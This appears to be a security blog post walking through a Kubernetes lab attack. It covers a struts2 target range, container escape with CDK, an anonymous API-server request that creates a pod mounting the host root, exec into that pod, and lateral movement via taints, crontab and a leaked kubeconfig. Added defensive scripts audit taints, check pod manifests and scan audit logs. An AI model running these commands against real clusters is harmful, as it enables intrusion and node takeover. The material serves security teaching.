海哥 posted on 2025-1-7 19:38:36

Cloud attack and defense - Cloud native & K8s security & practical scenarios & attacking Pods & Taints & lateral movement & container escape

Knowledge points

1. Cloud native - K8s security - Lateral movement - Taints
2. Cloud native - K8s security - Kubernetes practical scenarios
I. Demo case - Cloud native - K8s security - Lateral movement - Taints

How do you judge in practice whether a Taint can be used?
Set a taint:
kubectl taint nodes node1 xtz=value1:NoSchedule
Remove a taint:
kubectl taint nodes node1 xtz:NoSchedule-
In the node description, look for the Taints field.
Once you hold node-level access, check whether the other node hosts or the master host can be reached by lateral movement via taints:
kubectl describe nodes node-name
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152022031-368020315.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152023525-1304415427.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152026600-603494051.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152028329-837652994.png
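The taint check above is done by eye on `kubectl describe nodes` output. The script below is an added example (not part of this post) that does the same evaluation mechanically from the defender's side: it takes a constructed node list and pod list in the shape of `kubectl get nodes -o json` and `kubectl get pods -o json` (node and pod names are made up), applies the scheduler's taint/toleration matching rule, and reports which pods could land on which nodes, control-plane nodes that carry no NoSchedule taint, and pods whose tolerations let them onto a tainted control-plane node.

```python
"""Audit node taints against pod tolerations (added example, constructed data)."""
import json

CONTROL_PLANE_LABELS = ("node-role.kubernetes.io/control-plane",
                        "node-role.kubernetes.io/master")

# Constructed sample in the shape of `kubectl get nodes -o json`.
NODES_JSON = json.dumps({"items": [
    # control-plane node with the default NoSchedule taint
    {"metadata": {"name": "master1", "labels": {"node-role.kubernetes.io/control-plane": ""}},
     "spec": {"taints": [{"key": "node-role.kubernetes.io/control-plane", "effect": "NoSchedule"}]}},
    # control-plane node whose taint was removed (kubectl taint nodes ... :NoSchedule-)
    {"metadata": {"name": "master2", "labels": {"node-role.kubernetes.io/control-plane": ""}},
     "spec": {}},
    # worker carrying the custom xtz taint from the post
    {"metadata": {"name": "node1", "labels": {}},
     "spec": {"taints": [{"key": "xtz", "value": "value1", "effect": "NoSchedule"}]}},
]})

# Constructed sample in the shape of `kubectl get pods -o json`.
PODS_JSON = json.dumps({"items": [
    {"metadata": {"name": "web"}, "spec": {}},
    # blanket toleration: an Exists operator with no key tolerates every taint
    {"metadata": {"name": "tolerant"}, "spec": {"tolerations": [{"operator": "Exists"}]}},
    # tolerates only the custom worker taint
    {"metadata": {"name": "picky"}, "spec": {"tolerations": [
        {"key": "xtz", "operator": "Equal", "value": "value1", "effect": "NoSchedule"}]}},
]})


def toleration_matches(tol, taint):
    """Core v1 rule: effect must match (or be empty), then key/value per operator."""
    if tol.get("effect") and tol["effect"] != taint["effect"]:
        return False
    if tol.get("operator", "Equal") == "Exists":
        return not tol.get("key") or tol["key"] == taint["key"]
    return tol.get("key") == taint["key"] and tol.get("value", "") == taint.get("value", "")


def pod_can_land_on(pod, node):
    """Scheduler rule: every NoSchedule/NoExecute taint on the node must be tolerated."""
    blocking = [t for t in node["spec"].get("taints", [])
                if t["effect"] in ("NoSchedule", "NoExecute")]
    tols = pod["spec"].get("tolerations", [])
    return all(any(toleration_matches(tol, taint) for tol in tols) for taint in blocking)


def is_control_plane(node):
    return any(lbl in node["metadata"].get("labels", {}) for lbl in CONTROL_PLANE_LABELS)


def audit(nodes_json, pods_json):
    """Return (placement map pod -> schedulable nodes, list of findings)."""
    nodes = json.loads(nodes_json)["items"]
    pods = json.loads(pods_json)["items"]
    placement = {p["metadata"]["name"]: [n["metadata"]["name"] for n in nodes
                                         if pod_can_land_on(p, n)] for p in pods}
    findings = []
    for node in nodes:
        if not is_control_plane(node):
            continue
        name = node["metadata"]["name"]
        taints = node["spec"].get("taints", [])
        if not any(t["effect"] == "NoSchedule" for t in taints):
            findings.append(f"control-plane node {name} has no NoSchedule taint: "
                            f"any pod can be scheduled onto it")
            continue
        for pod in pods:
            if pod["spec"].get("tolerations") and pod_can_land_on(pod, node):
                findings.append(f"pod {pod['metadata']['name']} tolerates the taints "
                                f"on control-plane node {name}")
    return placement, findings


if __name__ == "__main__":
    placement, findings = audit(NODES_JSON, PODS_JSON)
    for pod, nodes in placement.items():
        print(f"{pod}: {nodes}")
    for f in findings:
        print("FINDING:", f)
```

Note that a missing taint on a control-plane node and a pod with a blanket `Exists` toleration are both visible in the API without any node access, so the same two conditions belong in a periodic cluster audit or an admission rule that rejects control-plane tolerations from non-system namespaces.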
II. Demo case - Cloud native - K8s security - Kubernetes practical scenarios

https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152100930-841446725.png
1. Attacking a Pod that hosts a web application

Web application deployment (struts2 vulnerability):
Pull the target-range image:
kubectl create deployment xiaodi --image=vulhub/struts2:2.3.28
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152615596-1148826916.png
Check the pod's status (owning node, internal IP, running state, etc.):
kubectl get pods -o wide
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152639708-632925681.png
Expose the target-range service:
kubectl expose deploy xiaodi --port=8080 --target-port=8080 --type=NodePort
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152707467-1017042368.png
kubectl get pod,svc
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152727184-8287724.png
Use the web vulnerability to obtain access
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152741457-291184914.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152753829-1605626896.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152756498-618719384.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152800714-116021874.png
Check whether the current webshell environment is a docker container
Two cases:
1. inside a plain docker container; 2. inside a docker container on some host managed by k8s
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152847365-1088143044.png
ls -al /
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152900633-224614887.png
But that is not the end of it, because this docker container is very likely running under k8s:
cat /proc/1/cgroup
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152925458-1675587361.png
Docker escape
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152937349-685790286.png
Tool: https://github.com/cdk-team/CDK
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152947390-1375141450.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152950130-1288966013.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152952080-1363793763.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152953708-1848598057.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152955522-1546378600.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152957565-1279031024.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107152959078-1995333805.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153016699-562862778.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153002315-613545649.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153026171-1137275355.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153033888-1882439168.png
2. Using an unauthenticated k8s API Server to submit and create a backdoor Pod

https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153054552-737400508.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153059091-663922165.png
./cdk_linux_amd64 kcurl anonymous post 'https://10.96.0.1:443/api/v1/namespaces/default/pods/' '{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}'
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153114543-1443880342.png
Or:
./kubectl -s 10.96.0.1:443 create -f test.yaml   // test.yaml contains the same manifest: {"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}
Check whether the backdoor pod was created:
curl -k https://10.96.0.1:443/api/v1/namespaces/default/pods
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153300967-419410114.png
3. Escaping to the host through the mounted directory

https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153313861-2069481552.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153317930-1645214070.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153320155-1085012611.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153321689-914778916.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153323420-553543112.png
Add parameters to bypass the interactive prompt:
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a get pods
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153341802-972218685.png
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a exec test02 -- bash -c "ls /host"   // the host directory is the mount point, equivalent to the host's / directory; the mount path can be chosen freely.
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153357125-1200047258.png
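Everything in sections 2 and 3 rests on one Pod setting: a hostPath volume for `/` mounted writable into the container. The following added example (not from this post, CDK or kubectl) is an admission-style check a defender would run over Pod manifests before they reach the API server, or as a validating webhook. It parses the manifest from section 2 (a constructed copy with the repeated last-applied annotation dropped) and a constructed hardened variant, and reports hostPath volumes, writable host mounts, privileged containers and shared host namespaces. The list of critical host paths is an assumption of the example.

```python
"""Admission-style Pod manifest check (added example, constructed manifests)."""
import json

# Manifest from section 2: nginx with the host's / mounted writable at /host.
BACKDOOR_POD = json.dumps({
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "test02", "namespace": "default"},
    "spec": {
        "containers": [{"image": "nginx:1.14.2", "name": "test02",
                        "volumeMounts": [{"mountPath": "/host", "name": "host"}]}],
        "volumes": [{"hostPath": {"path": "/", "type": "Directory"}, "name": "host"}],
    },
})

# Constructed comparison: same image, scratch volume instead of a host mount,
# explicitly unprivileged, no host namespaces.
HARDENED_POD = json.dumps({
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "test02", "namespace": "default"},
    "spec": {
        "containers": [{"image": "nginx:1.14.2", "name": "test02",
                        "securityContext": {"privileged": False,
                                            "allowPrivilegeEscalation": False},
                        "volumeMounts": [{"mountPath": "/scratch", "name": "scratch"}]}],
        "volumes": [{"emptyDir": {}, "name": "scratch"}],
    },
})

# Assumed list: host paths that hand over the node when mounted (host root,
# kubelet state, container runtime sockets, system config).
CRITICAL_HOST_PATHS = ("/", "/etc", "/root", "/var/lib/kubelet",
                       "/var/run/docker.sock", "/run/containerd")


def _path_is_critical(path):
    norm = "/" + path.strip("/")
    if norm == "/":
        return True
    return any(norm == p or norm.startswith(p + "/")
               for p in CRITICAL_HOST_PATHS if p != "/")


def check_pod(manifest_json):
    """Return a list of (severity, message) findings for one Pod manifest."""
    pod = json.loads(manifest_json)
    spec = pod.get("spec", {})
    findings = []
    host_vols = {}
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            path = vol["hostPath"].get("path", "")
            host_vols[vol["name"]] = path
            sev = "critical" if _path_is_critical(path) else "high"
            findings.append((sev, f"hostPath volume '{vol['name']}' exposes host path '{path}'"))
    for key in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(key):
            findings.append(("high", f"pod shares the host {key[4:]} namespace"))
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(("critical", f"container '{c['name']}' runs privileged"))
        for m in c.get("volumeMounts", []):
            if m["name"] in host_vols and not m.get("readOnly"):
                findings.append(("critical", f"container '{c['name']}' mounts host path "
                                             f"'{host_vols[m['name']]}' writable at {m['mountPath']}"))
    return findings


def admit(manifest_json):
    """Deny on any critical finding. (The built-in Pod Security 'baseline' level
    is stricter still: it rejects every hostPath volume.)"""
    return not any(sev == "critical" for sev, _ in check_pod(manifest_json))


if __name__ == "__main__":
    for label, manifest in (("backdoor", BACKDOOR_POD), ("hardened", HARDENED_POD)):
        print(label, "admit =", admit(manifest))
        for sev, msg in check_pod(manifest):
            print("  ", sev, msg)
```

In a real cluster the same outcome is reached with no custom code by labelling the namespace `pod-security.kubernetes.io/enforce: baseline`, which rejects the hostPath volume outright; the script is useful where manifests are reviewed outside the cluster, such as in CI.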
4. Lateral movement via taints

Reference: https://cn-sec.com/archives/1336486.html
Get the node details:
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a describe nodes | grep Taints
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153504031-1018517928.png
Or:
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a describe nodes
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153520445-329003257.png
cat > x.yaml > /master/etc/crontab   // the /master path here must match the mount path used above
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153735564-1069515179.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153737715-169920696.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153739119-576217006.png
5. Lateral movement via a leaked config

A config leaked from a node can also be used to move laterally to other nodes:
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153754315-19724574.png
https://img2024.cnblogs.com/blog/3407897/202501/3407897-20250107153755771-1472739797.png
./kubectl -s https://10.96.0.1:443/ --kubeconfig=config --insecure-skip-tls-verify=true get nodes
./kubectl apply -f test.yaml -n default --kubeconfig=config
./kubectl -n default --kubeconfig=config exec xiaodisec -- bash -c "ls /mnt/root"
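Sections 2, 3 and 5 all go through the API server, so they leave a trail in the apiserver audit log. The following added example (not from this post) runs three detection rules over constructed audit events written as JSON lines in the shape of an `audit.k8s.io/v1` Event (requestObject is present only when the audit policy records at RequestResponse level): writes or exec by the anonymous identity, Pod creations carrying a hostPath volume, and a node credential (`system:nodes` group, the case of a leaked node kubeconfig) used from an address outside the node network. Usernames, IPs, pod names and the `NODE_SUBNETS` value are constructed for the demo.

```python
"""Detection rules over Kubernetes audit events (added example, constructed log)."""
import json

# Constructed audit log: one JSON event per line, as the apiserver writes it.
AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    # anonymous user creates a pod with a hostPath volume (section 2)
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
     "verb": "create", "user": {"username": "system:anonymous", "groups": ["system:unauthenticated"]},
     "sourceIPs": ["10.244.1.7"],
     "objectRef": {"resource": "pods", "namespace": "default", "name": "test02"},
     "requestObject": {"spec": {"volumes": [{"name": "host", "hostPath": {"path": "/"}}]}},
     "responseStatus": {"code": 201}},
    # anonymous exec into that pod (section 3)
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseStarted",
     "verb": "create", "user": {"username": "system:anonymous", "groups": ["system:unauthenticated"]},
     "sourceIPs": ["10.244.1.7"],
     "objectRef": {"resource": "pods", "subresource": "exec", "namespace": "default", "name": "test02"},
     "responseStatus": {"code": 101}},
    # node credential used from a pod-network address to create a host-mount pod (section 5)
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
     "verb": "create", "user": {"username": "system:node:node1", "groups": ["system:nodes"]},
     "sourceIPs": ["10.244.1.7"],
     "objectRef": {"resource": "pods", "namespace": "default", "name": "xiaodisec"},
     "requestObject": {"spec": {"volumes": [{"name": "root", "hostPath": {"path": "/"}}]}},
     "responseStatus": {"code": 201}},
    # benign: the replicaset controller creating a pod with an emptyDir
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
     "verb": "create", "user": {"username": "system:serviceaccount:kube-system:replicaset-controller",
                                "groups": ["system:serviceaccounts"]},
     "sourceIPs": ["192.168.1.10"],
     "objectRef": {"resource": "pods", "namespace": "default", "name": "xiaodi-5b7c"},
     "requestObject": {"spec": {"volumes": [{"name": "tmp", "emptyDir": {}}]}},
     "responseStatus": {"code": 201}},
    # benign: the kubelet on node1 listing pods from the node network
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
     "verb": "list", "user": {"username": "system:node:node1", "groups": ["system:nodes"]},
     "sourceIPs": ["192.168.1.11"], "objectRef": {"resource": "pods"},
     "responseStatus": {"code": 200}},
])

WRITE_VERBS = {"create", "update", "patch", "delete", "deletecollection"}
SHELL_SUBRESOURCES = {"exec", "attach", "portforward"}
NODE_SUBNETS = ("192.168.1.",)   # constructed: prefixes kubelets legitimately connect from


def _creates_host_path(event):
    spec = (event.get("requestObject") or {}).get("spec", {})
    return any("hostPath" in v for v in spec.get("volumes", []))


def detect(log_text):
    """Return (severity, rule, username, target) tuples for every matching event."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        user = ev.get("user", {})
        name = user.get("username", "")
        groups = set(user.get("groups", []))
        ref = ev.get("objectRef", {})
        verb = ev.get("verb")
        target = f"{ref.get('resource')}/{ref.get('name') or '*'}"
        if ref.get("subresource"):
            target += f" ({ref['subresource']})"
        ips = ev.get("sourceIPs", [])

        # Rule 1: the anonymous identity must never write or open a shell.
        anonymous = name == "system:anonymous" or "system:unauthenticated" in groups
        if anonymous and (verb in WRITE_VERBS or ref.get("subresource") in SHELL_SUBRESOURCES):
            findings.append(("critical", "anonymous-write", name, target))
        # Rule 2: any pod write that introduces a hostPath volume.
        if (verb in ("create", "update", "patch") and ref.get("resource") == "pods"
                and not ref.get("subresource") and _creates_host_path(ev)):
            findings.append(("high", "hostpath-pod", name, target))
        # Rule 3: a node credential speaking from outside the node network.
        if "system:nodes" in groups and not all(ip.startswith(NODE_SUBNETS) for ip in ips):
            findings.append(("critical", "node-credential-offnet", name, target))
    return findings


if __name__ == "__main__":
    for f in detect(AUDIT_LOG):
        print(*f)
```

Rule 1 fires only if the apiserver runs with anonymous authentication enabled; turning it off (`--anonymous-auth=false`) removes that whole class of events. Rule 3 is a heuristic that depends on knowing where kubelets live on the network; the node authorizer already limits what a node credential may create, but a stolen node kubeconfig can still read secrets for pods on that node, so its use from a pod address is worth an alert on its own.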
